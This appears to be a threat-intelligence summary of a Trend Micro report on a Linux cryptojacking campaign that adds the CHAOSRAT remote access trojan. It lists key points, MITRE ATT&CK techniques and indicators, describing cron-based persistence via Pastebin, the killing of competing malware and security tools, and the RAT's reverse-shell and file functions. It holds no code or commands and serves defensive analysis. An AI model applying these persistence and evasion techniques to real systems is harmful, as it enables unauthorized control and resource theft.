Trend Micro intercepted a Linux cryptomining campaign that now incorporates the CHAOS Remote Administrative Tool (CHAOSRAT) to enhance control over infected hosts. The operation persists via cron-based mechanisms, downloads XMRig and the RAT from distributed sources, and uses a Russia-based downloader server with a Hong Kong C2, underscoring evolving cloud-based threat activity.
#CHAOSRAT #Kinsing #TeamTNT #XMRig #Pastebin #Russia #HongKong
#CHAOSRAT #Kinsing #TeamTNT #XMRig #Pastebin #Russia #HongKong
Keypoints
- The attack blends cryptocurrency mining with a remote access Trojan (CHAOSRAT), continuing a pattern of Linux cryptojacking in cloud environments.
- The operators attempt to disable competing malware and security products to protect mining performance (defense evasion).
- Persistence is achieved by altering /etc/crontab to download the malware every 10 minutes from Pastebin.
- Following persistence, the campaigns download additional payloads, including an XMRig miner, its config, a “competition killer” script, and CHAOSRAT itself.
- The main downloader/downloading infrastructure appears Russia-based, while CHAOSRAT connects to a C2 server likely located in Hong Kong using JWT for authentication.
- CHAOSRAT is a Go binary offering remote capabilities such as reverse shells, file operations, screen capture, OS info, and more, with address/token hardcoded as compilation flags.
MITRE Techniques
- [T1053.005] Cron – Persistence via UNIX cron: “The malware achieves its persistence by altering /etc/crontab file, a UNIX task scheduler that, in this case, downloads itself every 10 minutes from Pastebin.”
- [T1105] Ingress Tool Transfer – Downloading payloads: “This is followed by downloading additional payloads: an XMRig miner, its configuration file, a shell script looping ‘competition killer,’ and most importantly, the RAT itself.”
- [T1113] Screen Capture – Remote screen capture: “Take screenshots.”
- [T1219] Remote Access Software – Remote control capabilities via CHAOSRAT: “The RAT is a Go-compiled binary with the following functions: Perform reverse shell, Download files, Upload files, Delete files, Take screenshots, Access file explorer, Gather operating system information, Restart the PC, Shutdown the PC, Open a URL.”
- [T1082] System Information Discovery – Information gathering: “Gather operating system information.”
- [T1071.001] Web Protocols – C2 communication: “connects to the C&C server via its address, and default port, using a JSON Web Token (JWT) for authorization.”
- [T1562.001] Impair Defenses – Disable competing tools: “terminating competing malware such as Kinsing and the killing of resources that influence cryptocurrency mining performance remained unchanged.”
- [T1059.004] Unix Shell – Reverse shell capability: “Perform reverse shell.”
- [T1107] File Deletion – File removal capability: “Delete files.”
Indicators of Compromise
- [Domain] Pastebin – usage to host and fetch payloads for persistence and updates, e.g., “downloads itself every 10 minutes from Pastebin.”
- [Domain] GitHub – CHAOSRAT resources and function references mentioned on a GitHub page: “GitHub page for CHAOS RAT showing some of its functions.”
Read more: https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html